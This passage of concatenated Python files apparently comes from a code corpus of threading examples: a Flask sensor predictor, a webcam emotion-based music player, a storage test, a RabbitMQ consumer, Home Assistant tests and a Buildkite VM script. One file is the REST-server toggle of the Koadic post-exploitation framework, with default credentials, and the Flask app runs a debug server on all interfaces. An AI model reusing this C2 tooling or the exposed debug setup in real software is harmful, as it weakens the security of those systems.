new_data = db.nodes.find_one({'_id': _id})
output = {'id_node': new_data['id_node'],
'datetime': new_data['datetime'], 'sensors': new_data['sensors']}
return jsonify(output)
@app.route('/data', methods=['GET'])
def get_predict():
global model_1, model_2, y_test_1, predictions_1, y_test_2, predictions_2
now = datetime.now()
dt = str(now.strftime('%d/%m/%Y %H:%M'))
hora = now.hour*60
t = hora+now.minute
temperature = pd.Series(model_1.predict(np.array([[t]]))).to_json(
orient='values').replace('[', '').replace(']', '')
humidity = pd.Series(model_2.predict(np.array([[t]]))).to_json(
orient='values').replace('[', '').replace(']', '')
predictions_1 = model_1.predict(X_test_1)
predictions_2 = model_2.predict(X_test_2)
# print(predictions_1)
# print(predictions_2)
output = {
'datetime': dt,
'data_predict': {
'temperature': {
'value': round(float(temperature), 2),
'MAE': round(metrics.mean_absolute_error(y_test_1, predictions_1), 2),
'MSE': round(metrics.mean_squared_error(y_test_1, predictions_1), 2),
'RMSE': round(np.sqrt(metrics.mean_squared_error(y_test_1, predictions_1)), 2)
},
'humidity': {
'value': round(float(humidity), 2),
'MAE': round(metrics.mean_absolute_error(y_test_2, predictions_2), 2),
'MSE': round(metrics.mean_squared_error(y_test_2, predictions_2), 2),
'RMSE': round(np.sqrt(metrics.mean_squared_error(y_test_2, predictions_2)), 2)
}
},
}
return jsonify(output)
def get_data_initial():
global data, qtd_data
for i in nodes.find():
datetime_in_string = i['datetime']
dt = datetime.strptime(datetime_in_string, datetime_format)
hora = dt.hour*60
t = hora+dt.minute
data.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
qtd_data = len(data)
print("Base de dados inserida")
def training_initial():
global model_1, model_2, data, X_train_1, X_test_1, y_train_1, y_test_1, X_train_2, X_test_2, y_train_2, y_test_2
get_data_initial()
print("Training initial...")
df = pd.DataFrame(data)
X_train_1, X_test_1, y_train_1, y_test_1 = train_test_split(df.drop(
columns=['temperature', 'humidity']), df['temperature'], random_state=1)
X_train_2, X_test_2, y_train_2, y_test_2 = train_test_split(df.drop(
columns=['temperature', 'humidity']), df['humidity'], random_state=1)
model_1.fit(X_train_1, y_train_1)
model_2.fit(X_train_2, y_train_2)
print("initial models created")
def get_data():
global date_read, date_time_last, data, qtd_data
output = []
print("datetime last training:", date_time_last)
count = nodes.count_documents({})-qtd_data
print("qtd new data:", count)
if(count > 0):
c = 0
for i in nodes.find():
c = c+1
if(c > len(data)):
datetime_in_string = i['datetime']
dt = datetime.strptime(datetime_in_string, datetime_format)
hora = dt.hour*60
t = hora+dt.minute
output.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
data.append(
{'datetime': t, 'temperature': i['sensors'][0]['value'], 'humidity': i['sensors'][1]['value']})
date_read = datetime.now()
date_time_last = str(date_read.strftime(datetime_format))
qtd_data = len(data)
print("qtd data:", len(data))
return output
def training():
global model_1, model_2, data
while True:
time.sleep(TIME_TRAINING)
print("Training...")
dataNew = get_data()
if(len(dataNew) == 0):
print("nothing new for training")
else:
print("partial fit for new data")
df = pd.DataFrame(dataNew)
model_1.partial_fit(
df.drop(columns=['temperature', 'humidity']), df['temperature'])
model_2.partial_fit(
df.drop(columns=['temperature', 'humidity']), df['humidity'])
def startWebServer():
port = int(os.environ.get("PORT", 5001))
app.run(debug=True, host='0.0.0.0', port=port, threaded=True)
if __name__ == "__main__":
threading.Thread(target=training_initial).start()
threading.Thread(target=training).start()
startWebServer()
|
notebook.py
|
import os.path as osp
import sys
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import torch.hub
import os
import model
from PIL import Image
from torchvision import transforms
from visualize.grad_cam import BackPropagation, GradCAM,GuidedBackPropagation
import threading
import time
import vlc
from random import seed,random, randint
import pickle
from os.path import dirname, join
current_dir = os.path.dirname(os.path.realpath(__file__))
# Check CUDA availability
torch.cuda.is_available()
# Load the Haar cascade face detector used before emotion classification
faceCascade = cv2.CascadeClassifier(current_dir+'/visualize/haarcascade_frontalface_default.xml')
# Input image shape
shape = (48,48)
# Name Classes
classes = [
'Angry',
'Disgust',
'Fear',
'Happy',
'Sad',
'Surprised',
'Neutral'
]
# Use the GPU if available, otherwise fall back to the CPU
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# Hide unnecessary messages
class HiddenPrints:
def __enter__(self):
self._original_stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
def __exit__(self, exc_type, exc_val, exc_tb):
sys.stdout.close()
sys.stdout = self._original_stdout
# Pre-processing for face detection before model with opencv
def preprocess(image_path):
global faceCascade
global shape
transform_test = transforms.Compose([
transforms.ToTensor()
])
image = cv2.imread(image_path)
faces = faceCascade.detectMultiScale(
image,
scaleFactor=1.1,
minNeighbors=5,
minSize=(1, 1),
flags=cv2.CASCADE_SCALE_IMAGE
)
flag =0
if len(faces) == 0:
print('no face found')
face = cv2.resize(image, shape)
else:
(x, y, w, h) = faces[0]
face = image[y:y + h, x:x + w]
face = cv2.resize(face, shape)
flag=1
img = Image.fromarray(face).convert('L')
inputs = transform_test(img)
return inputs, face, flag
# Plot the results for testing
def plotImage(path, mylabel):
global shape
img = cv2.imread(path)
dimensions = img.shape
height = img.shape[0]
width = img.shape[1]
cv2.putText(img, mylabel,(round(width/2)-40,height-20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255), 2, cv2.LINE_AA)
cv2.imwrite(current_dir+'/temp-images/display.jpg',img)
img = cv2.imread(current_dir+'/temp-images/display.jpg')
cv2.imshow('image',img)
k = cv2.waitKey(30) & 0xff
# Emotion detection with Pytorch model
def detect_emotion(images, model_name):
global classes
global device
flag=0
with HiddenPrints():
for i, image in enumerate(images):
target, raw_image,flag = preprocess(image['path'])
image['image'] = target
image['raw_image'] = raw_image
net = model.Model(num_classes=len(classes)).to(device)
checkpoint = torch.load(os.path.join(current_dir+'/model', model_name), map_location=device)
net.load_state_dict(checkpoint['net'])
net.eval()
result_images = []
label = ""
if(flag):
for index, image in enumerate(images):
with HiddenPrints():
img = torch.stack([image['image']]).to(device)
bp = BackPropagation(model=net)
probs, ids = bp.forward(img)
actual_emotion = ids[:,0]
label = classes[actual_emotion.data]
plotImage(image['path'],label)
else:
plotImage(image['path'],label)
return label
# Seed label
with open(current_dir+"/label", "wb") as f:
pickle.dump("", f)
# Thread 1: Emotion detection
def detection():
global classes
video_capture = cv2.VideoCapture(0)
while 1:
ret, frame = video_capture.read()
cv2.imwrite(current_dir+'/temp-images/test.jpg',frame)
detection = detect_emotion(images=[{'path': current_dir+'/temp-images/test.jpg'}],model_name='emotions.t7')
with open(current_dir+"/label", "wb") as f:
pickle.dump(detection, f)
# Thread 2: Music control according to detected emotion
def music():
global classes
seed(round(random()*10))
counter = [0,0,0,0,0,0,0]
label=""
# We start the program assuming the person feels neutral
status="Neutral"
memstatus=""
flag = 0
entries = os.listdir(current_dir+'/music/Favs/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Favs/"+entries[value])
p.play()
while 1:
        # The detected emotion must be seen 10 times (roughly 10 seconds) before the status changes
try:
with open(current_dir+"/label", "rb") as f:
label = pickle.load(f)
time.sleep(1)
y=0
for x in classes:
if(x==label):
counter[y] = counter[y] + 1
y = y + 1
y=0
for x in counter:
if(x == 10):
status = classes[y]
counter = [0,0,0,0,0,0,0]
flag = 1
break
y = y + 1
"""
According to the detected emotion we will randomly reproduce a song from one of our playlists:
- If the person is angry we will play a song that generates calm
- If the person is sad, a song for the person to be happy
- If the person is neutral or happy we will play some of their favorite songs
Note: If the detected emotion has not changed, the playlist will continue without changing the song.
"""
if((status=='Angry' and flag and status!=memstatus) or (not(p.is_playing()) and status=='Angry' and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Chill/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Chill/"+entries[value])
p.play()
elif(((status=='Neutral' or status=='Happy') and flag and status!=memstatus) or (not(p.is_playing()) and (status=='Neutral' or status=='Happy') and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Favs/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Favs/"+entries[value])
p.play()
elif((status=='Sad' and flag and status!=memstatus) or (not(p.is_playing()) and status=='Sad' and flag)):
seed(round(random()*10))
memstatus = status
p.stop()
entries = os.listdir(current_dir+'/music/Happy/')
value = randint(0, len(entries)-1)
p = vlc.MediaPlayer(current_dir+"/music/Happy/"+entries[value])
p.play()
except:
...
# Run emotion detection and music control concurrently in separate threads
d = threading.Thread(target=detection, name='detection')
m = threading.Thread(target=music, name='music')
d.start()
m.start()
|
webrequest.py
|
import requests
import threading
from multiprocessing.pool import ThreadPool
import time
import sys
URL = "http://192.168.219.158:80/facerec"
webcamStreamURL="192.168.219.142:8090/?action=snapshot"
def faceAuthRequest(requestParams, result):
    # Store the response in the shared dict so the caller can read it after join()
    res = requests.get(URL, params=requestParams, timeout=20)
    result['status_code'] = res.status_code
    result['json'] = res.json()
jsonParams = {'username': 'parkjaehyun', 'stream_url': webcamStreamURL}
if __name__ == '__main__':
    retJson = {}
    getRequestThread = threading.Thread(target=faceAuthRequest, args=(jsonParams, retJson))
    getRequestThread.start()
    getRequestThread.join(timeout=21.0)
    if getRequestThread.is_alive():  # thread still running after the timeout
        print("Face recognition failed, please reload the face recognition module..")
        sys.exit(1)
    print(retJson)
sys.exit(0)
|
SPOR_BASIC_5.py
|
#!/usr/bin/env python3
import sys
import os
import re
import subprocess
from threading import Thread
import TEST_FIO
import TEST_LIB
import TEST_LOG
import TEST_SETUP_POS
arrayId = 0
volId = 1
current_test = 0
############################################################################
# Test Description
# Multi threads simultaneously write patterns to the volume,
# simulate SPOR,
# and verify all patterns to see pos works properly
############################################################################
def test(size):
global current_test
current_test = current_test + 1
TEST_LOG.print_notice("[{} - Test {} Started]".format(filename, current_test))
write_size = TEST_LIB.parse_size(size)
max_num_thread = int(TEST_LIB.get_num_thread())
thread_list = []
for idx in range(max_num_thread):
TEST_LIB.create_new_pattern(arrayId, volId)
th = Thread(target=TEST_FIO.write, args=(arrayId, volId, write_size * idx, size, TEST_LIB.get_latest_pattern(arrayId, volId)))
thread_list.append(th)
th.start()
for th in thread_list:
th.join()
TEST_SETUP_POS.trigger_spor()
TEST_SETUP_POS.dirty_bringup()
TEST_SETUP_POS.create_subsystem(arrayId, volId)
TEST_SETUP_POS.mount_volume(arrayId, volId)
for idx in range(max_num_thread):
TEST_FIO.verify(arrayId, volId, write_size * idx, size, TEST_LIB.get_pattern(arrayId, volId, idx))
TEST_LOG.print_notice("[Test {} Completed]".format(current_test))
def execute():
sizes = ['1M']
for _size in sizes:
test(size=_size)
if __name__ == "__main__":
global filename
filename = sys.argv[0].split("/")[-1].split(".")[0]
TEST_LIB.set_up(argv=sys.argv, test_name=filename)
TEST_SETUP_POS.clean_bringup()
TEST_SETUP_POS.create_subsystem(arrayId, volId)
TEST_SETUP_POS.create_volume(arrayId, volId)
execute()
TEST_LIB.tear_down(test_name=filename)
|
genclocks.py
|
#!/usr/bin/env python
'''
Copyright (c) 2020 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
#!/usr/bin/env python
import logging
import signal
import time
import sys
from threading import Thread
import alsaaudio
from hifiberrydsp.hardware.adau145x import Adau145x
from hifiberrydsp.client.sigmatcp import SigmaTCPClient
stopped = False
device="default"
waitseconds=0
PERIODSIZE=1024
BYTESPERSAMPLE=8
pcm=None
sigmatcp=None
def silenceloop():
global stopped
global pcm
try:
pcm=alsaaudio.PCM(alsaaudio.PCM_PLAYBACK, device=device)
except:
logging.debug("sound card probably in use, doing nothing")
return
logging.debug("SPDIF lock, playing silence")
while spdifactive() and not(stopped):
time.sleep(1)
logging.debug("not stopped")
pcm=None
def spdifactive():
inputlock = int.from_bytes(sigmatcp.read_memory(0xf600, 2),byteorder='big') & 0x0001
return inputlock > 0
def stop_playback(_signalNumber, _frame):
global stopped
logging.info("received USR1, stopping music playback")
stopped = True
# Re-activate in 15 seconds
t = Thread(target=activate_again, args=(15,))
t.start()
def activate_again(seconds):
time.sleep(seconds)
global stopped
stopped=False
def main():
global sigmatcp
if len(sys.argv) > 1:
if "-v" in sys.argv:
logging.basicConfig(format='%(levelname)s: %(name)s - %(message)s',
level=logging.DEBUG,
force=True)
else:
logging.basicConfig(format='%(levelname)s: %(name)s - %(message)s',
level=logging.INFO,
force=True)
signal.signal(signal.SIGUSR1, stop_playback)
sigmatcp = SigmaTCPClient(Adau145x(),"127.0.0.1")
while True:
time.sleep(1)
if stopped:
logging.debug("stopped")
continue
if (spdifactive()):
silenceloop()
else:
logging.debug("no SPDIF lock, sleeping")
if __name__ == '__main__':
main()
|
consumer.py
|
#!/usr/bin/env python
import threading
import pika
import ast
import time
class ConsumeManager:
def __init__(self, queue_name):
# Initial setting for RabbitMQ
pika_params = pika.ConnectionParameters(
host='rabbitmq',
connection_attempts=10,
heartbeat=0
)
# Creating connection
self.pika_conn = pika.BlockingConnection(pika_params)
self.channel = self.pika_conn.channel()
self.channel.queue_declare(
queue=queue_name,
auto_delete=False,
durable=True
)
class Consumer(ConsumeManager):
def __init__(self, queue_name):
ConsumeManager.__init__(self, queue_name)
self.queue_name = queue_name
self.channel.basic_qos(prefetch_count=1)
def execute(self):
try:
self.channel.basic_consume(
queue=self.queue_name,
on_message_callback=self.callback,
auto_ack=True
)
self.channel.start_consuming()
except Exception as e:
print(e)
def callback(self, ch, method, properties, body):
try:
body = body.decode("UTF-8")
body = ast.literal_eval(body)
print(f'queue_name: {self.queue_name}, body: {body}')
# time.sleep(3)
"""
start ML task here.
"""
# test
# raise Exception('raise Exception')
except Exception as e:
print(e)
THREADS = 10
if __name__ == '__main__':
threads = []
for thread in range(THREADS):
print(f"\n[CREATE]: threading of task1-{thread}.")
receiver = Consumer(queue_name='task1')
t1 = threading.Thread(target=receiver.execute)
t1.daemon = True
threads.append(t1)
t1.start()
print(f"\n[CREATE]: threading of task2-{thread}.")
receiver = Consumer(queue_name='task2')
t2 = threading.Thread(target=receiver.execute)
t2.daemon = True
threads.append(t2)
t2.start()
for t in threads:
t.join()
|
api.py
|
import core.rest_server
import time
import sys
import os
DESCRIPTION = "turn off/on the rest api"
def autocomplete(shell, line, text, state):
return None
def help(shell):
shell.print_plain("")
shell.print_plain("Turning on the REST Server:")
shell.print_plain("api on (--user USERNAME --pass PASSWORD --port PORT)")
shell.print_plain("Username and password defaults to 'koadic'. Port defaults to 9990.")
shell.print_plain("")
shell.print_plain("Turning off the REST Server:")
shell.print_plain("api off")
shell.print_plain("")
def execute(shell, cmd):
splitted = cmd.split()
if len(splitted) > 1:
username = "koadic"
password = "koadic"
port = "9990"
remote = False
secure = []
if "--user" in splitted:
username = splitted[splitted.index("--user")+1]
if "--pass" in splitted:
password = splitted[splitted.index("--pass")+1]
if "--port" in splitted:
port = splitted[splitted.index("--port")+1]
if "--remote" in splitted:
remote = True
if "--cert" in splitted and "--key" in splitted:
secure = [splitted[splitted.index("--cert")+1], splitted[splitted.index("--key")+1]]
sw = splitted[1].lower()
if sw == "on":
if not shell.rest_thread:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(('127.0.0.1', int(port)))
except OSError as e:
if e.errno == 98:
shell.print_error("Port %s is already bound!" % (port))
elif e.errno == 13:
shell.print_error("Port %s bind permission denied!" % (port))
s.close()
return
s.close()
rest_server = core.rest_server.RestServer(shell, port, username, password, remote, secure)
def thread_rest_server():
try:
rest_server.run()
except SystemExit:
pass
shell.rest_thread = core.rest_server.KThread(target=thread_rest_server)
shell.rest_thread.daemon = True
stdout = sys.stdout
f = open(os.devnull, 'w')
sys.stdout = f
shell.rest_thread.start()
time.sleep(2)
sys.stdout = stdout
# ok, now THIS is the most embarassing thing i've ever done.
# i don't know how to pass exceptions from the thread to the caller.
# so here we are.
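                # Sketch of a common alternative (not wired in here, requires `import queue`):
                # have the thread push exceptions onto a queue.Queue that the caller checks
                # after the startup wait, e.g.
                #
                #   errors = queue.Queue()
                #   def thread_rest_server():
                #       try:
                #           rest_server.run()
                #       except SystemExit:
                #           pass
                #       except Exception as exc:
                #           errors.put(exc)
                #   ...
                #   if not errors.empty():
                #       shell.print_error(str(errors.get()))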
if "started" in shell.rest_thread.localtrace(0,0,0).__str__():
shell.print_good("Rest server running on port %s" % port)
shell.print_status("Username: %s" % username)
shell.print_status("Password: %s" % password)
shell.print_status("API Token: %s" % rest_server.token)
else:
shell.rest_thread.kill()
shell.rest_thread = ""
shell.print_error("Could not start rest server.")
else:
shell.print_error("Rest server already running")
elif sw == "off":
if shell.rest_thread:
shell.rest_thread.kill()
shell.rest_thread = ""
shell.print_good("Rest server shutdown")
else:
shell.print_error("Rest server not running")
else:
help(shell)
|
main.py
|
from threading import *
from terminal import *
import listener
cmd = ''
if __name__ == '__main__':
#terminal
terminal = Terminal()
terminal_thread = Thread(target=terminal.cmdloop)
terminal_thread.start()
#web
print('Starting Webserver')
listener.run()
|
test_bootstrap.py
|
"""Test the bootstrapping."""
# pylint: disable=too-many-public-methods,protected-access
import tempfile
from unittest import mock
import threading
import logging
import voluptuous as vol
from homeassistant import bootstrap, loader
import homeassistant.util.dt as dt_util
from homeassistant.helpers.config_validation import PLATFORM_SCHEMA
from tests.common import \
get_test_home_assistant, MockModule, MockPlatform, assert_setup_component
ORIG_TIMEZONE = dt_util.DEFAULT_TIME_ZONE
_LOGGER = logging.getLogger(__name__)
class TestBootstrap:
"""Test the bootstrap utils."""
hass = None
backup_cache = None
# pylint: disable=invalid-name, no-self-use
def setup_method(self, method):
"""Setup the test."""
self.backup_cache = loader._COMPONENT_CACHE
if method == self.test_from_config_file:
return
self.hass = get_test_home_assistant()
def teardown_method(self, method):
"""Clean up."""
if method == self.test_from_config_file:
return
dt_util.DEFAULT_TIME_ZONE = ORIG_TIMEZONE
self.hass.stop()
loader._COMPONENT_CACHE = self.backup_cache
@mock.patch('homeassistant.util.location.detect_location_info',
return_value=None)
def test_from_config_file(self, mock_detect):
"""Test with configuration file."""
components = ['browser', 'conversation', 'script']
with tempfile.NamedTemporaryFile() as fp:
for comp in components:
fp.write('{}:\n'.format(comp).encode('utf-8'))
fp.flush()
self.hass = bootstrap.from_config_file(fp.name)
components.append('group')
assert sorted(components) == sorted(self.hass.config.components)
def test_handle_setup_circular_dependency(self):
"""Test the setup of circular dependencies."""
loader.set_component('comp_b', MockModule('comp_b', ['comp_a']))
def setup_a(hass, config):
"""Setup the another component."""
bootstrap.setup_component(hass, 'comp_b')
return True
loader.set_component('comp_a', MockModule('comp_a', setup=setup_a))
bootstrap.setup_component(self.hass, 'comp_a')
assert ['comp_a'] == self.hass.config.components
def test_validate_component_config(self):
"""Test validating component configuration."""
config_schema = vol.Schema({
'comp_conf': {
'hello': str
}
}, required=True)
loader.set_component(
'comp_conf', MockModule('comp_conf', config_schema=config_schema))
assert not bootstrap._setup_component(self.hass, 'comp_conf', {})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': None
})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {}
})
assert not bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
assert bootstrap._setup_component(self.hass, 'comp_conf', {
'comp_conf': {
'hello': 'world',
}
})
def test_validate_platform_config(self):
"""Test validating platform configuration."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
loader.set_component(
'platform_conf',
MockModule('platform_conf', platform_schema=platform_schema))
loader.set_component(
'platform_conf.whatever', MockPlatform('whatever'))
with assert_setup_component(0):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'hello': 'world',
'invalid': 'extra',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
'platform_conf 2': {
'invalid': True
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.config.components.remove('platform_conf')
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert bootstrap._setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert not bootstrap.setup_component(self.hass, 'non_existing')
def test_component_not_double_initialized(self):
"""Test we do not setup a component twice."""
mock_setup = mock.MagicMock(return_value=True)
loader.set_component('comp', MockModule('comp', setup=mock_setup))
assert bootstrap.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert bootstrap.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
loader.set_component(
'comp', MockModule('comp', requirements=['package==0.0.1']))
assert not bootstrap.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not setup twice."""
loader.set_component('comp', MockModule('comp'))
result = []
def setup_component():
"""Setup the component."""
result.append(bootstrap.setup_component(self.hass, 'comp'))
with bootstrap._SETUP_LOCK:
thread = threading.Thread(target=setup_component)
thread.start()
self.hass.config.components.append('comp')
thread.join()
assert len(result) == 1
assert result[0]
def test_component_not_setup_missing_dependencies(self):
"""Test we do not setup a component if not all dependencies loaded."""
deps = ['non_existing']
loader.set_component('comp', MockModule('comp', dependencies=deps))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
self.hass.config.components.append('non_existing')
assert bootstrap._setup_component(self.hass, 'comp', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
loader.set_component(
'comp', MockModule('comp', setup=lambda hass, config: False))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Setup that raises exception."""
raise Exception('fail!')
loader.set_component('comp', MockModule('comp', setup=exception_setup))
assert not bootstrap._setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_home_assistant_core_config_validation(self):
"""Test if we pass in wrong information for HA conf."""
# Extensive HA conf validation testing is done in test_config.py
assert None is bootstrap.from_config_dict({
'homeassistant': {
'latitude': 'some string'
}
})
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Setup method that tests config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
loader.set_component('comp_a',
MockModule('comp_a', setup=config_check_setup))
loader.set_component('switch.platform_a', MockPlatform('comp_b',
['comp_a']))
bootstrap.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock()
loader.set_component(
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.config.components.remove('switch')
with assert_setup_component(1):
assert bootstrap.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: None))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: False))
assert not bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
loader.set_component(
'disabled_component',
MockModule('disabled_component', setup=lambda hass, config: True))
assert bootstrap.setup_component(self.hass, 'disabled_component')
assert loader.get_component('disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
|
create_instances.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import queue
import re
import subprocess
import sys
import threading
DEBUG = True
LOCATION = 'europe-west1-d'
# Note that the hostnames are parsed and trigger specific behavior for different use cases.
# The following parts have a special meaning:
#
# - "buildkite": This is a normal production VM running the Buildkite agent.
# - "pipeline": This is a special production VM that only runs pipeline setup scripts.
# - "testing": This is a shared VM that can be used by project members for experiments.
# It does not run the Buildkite agent.
# - "$USER": This is a VM used by one specific engineer for tests. It does not run the Buildkite
# agent.
#
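# The naming convention above can be checked mechanically. The helper below is a
# minimal illustrative sketch and is NOT part of the original script; its name and
# return values are assumptions made purely for documentation purposes.
def classify_hostname(hostname):
    """Best-effort guess of a VM's role based on the naming convention above."""
    if 'pipeline' in hostname:
        return 'pipeline setup VM (production)'
    if 'buildkite' in hostname:
        return 'Buildkite agent VM (production)'
    if 'testing' in hostname:
        return 'shared testing VM (no Buildkite agent)'
    if hostname.startswith(getpass.getuser()):
        return 'personal VM (no Buildkite agent)'
    return 'unknown'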
INSTANCE_GROUPS = {
'buildkite-ubuntu1404': {
'count': 8,
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'buildkite-ubuntu1604': {
'count': 8,
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'buildkite-windows': {
'count': 4,
'startup_script': 'startup-windows.ps1',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=scsi',
},
}
SINGLE_INSTANCES = {
'buildkite-pipeline-ubuntu1604': {
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-8',
'persistent_disk': 'buildkite-pipeline-persistent'
},
'testing-ubuntu1404': {
'image_family': 'buildkite-ubuntu1404',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'persistent_disk': 'testing-ubuntu1404-persistent'
},
'testing-ubuntu1604': {
'image_family': 'buildkite-ubuntu1604',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'persistent_disk': 'testing-ubuntu1604-persistent'
},
'testing-windows': {
'image_family': 'buildkite-windows',
'machine_type': 'n1-standard-32',
'boot_disk_size': '500GB'
},
'{}-ubuntu1404'.format(getpass.getuser()): {
'image_family': 'buildkite-ubuntu1404',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'{}-ubuntu1604'.format(getpass.getuser()): {
'image_family': 'buildkite-ubuntu1604',
'startup_script': 'startup-ubuntu.sh',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=nvme',
},
'{}-windows'.format(getpass.getuser()): {
'image_family': 'buildkite-windows',
'startup_script': 'startup-windows.ps1',
'machine_type': 'n1-standard-32',
'local_ssd': 'interface=scsi',
}
}
PRINT_LOCK = threading.Lock()
WORK_QUEUE = queue.Queue()
def debug(*args, **kwargs):
if DEBUG:
print(*args, **kwargs)
def run(args, **kwargs):
